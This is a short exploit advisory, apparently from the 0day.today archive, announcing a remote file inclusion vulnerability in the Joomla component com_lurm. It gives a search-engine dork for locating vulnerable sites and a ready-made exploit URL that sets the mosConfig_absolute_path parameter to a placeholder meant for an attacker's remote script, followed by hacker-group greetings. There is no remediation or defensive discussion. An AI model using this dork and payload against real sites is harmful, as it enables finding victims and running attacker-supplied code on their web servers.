id: 14378
date: 10/08/2010
title: Joomla Component com_lurm RFI Vulnerability
author: jos_ali_joe
cves: 

===========================================
Joomla Component com_lurm RFI Vulnerability
===========================================

[+] Author    : jos_ali_joe
[+] Homepage  : http://josalijoe.org/  &  http://indonesiancoder.com/
[+] Mail      : josalijoe[at]yahoo[dot]com
[+] Date      : oktober 07,2010
[+] Vendor    : N/A
[+] Dork      : inurl:index.php?option="com_lurm"

---------------------------------------------------------------------------

[$] ExPLo!T : http://www.example.com/index.php?option=com_lurm&Itemid=&mosConfig_absolute_path=[IndonesianCoder]

---------------------------------------------------------------------------

Greets For :



My Team : ./Indonesian Coder



#  0day.today [2023-03-25]  #